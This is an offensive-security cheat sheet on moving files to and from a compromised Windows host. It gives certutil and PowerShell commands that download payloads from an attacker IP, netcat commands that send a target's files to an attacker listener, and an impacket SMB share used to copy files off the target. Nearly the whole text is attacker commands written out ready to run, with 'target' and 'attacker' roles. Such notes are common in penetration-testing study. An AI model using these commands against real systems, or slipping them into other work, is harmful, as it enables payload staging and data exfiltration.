Escort (Payload)

Windows

Windows - certutil.exe

# certutil.exe
# -urlcache = display / delete URL cache entries
# -f = force fetch & update URL cache
$ certutil.exe -urlcache -f -split [http://[ip]/path_to_file]

Windows - Powershell

# .NET Object
$ powershell -c (New-Object System.Net.WebClient).DownloadFile('http://[ip]/[file]', 'C:\[filePath]')
$ powershell -c (New-Object System.Net.WebClient).DownloadString('http://[ip]/[file]')
# Invoke-WebRequest
$ powershell -c Invoke-WebRequest -uri 'http://[ip]/[file]' -outfile 'C:\[filePath]'
$ powershell -c wget 'http://[ip]/[file]' -outfile 'C:\[filePath]'

Windows - nc.exe

# nc.exe
# target -- file --> attacker
# need to transfer nc.exe to the target first

# Target (-nv can be omitted)
$ nc.exe -nv [ip] [port] < [filePath]

# Attacker
$ nc -lvnp [port] > [file]

SMB Server

# Attacker (Kali)
# target -- file --> attacker
$ impacket-smbserver [share name] [share path]
# Target (Windows)
# check the share
$ dir \\[ip]\[sharename]

# target -- file --> attacker
$ copy [filePath] \\[ip]\[sharename]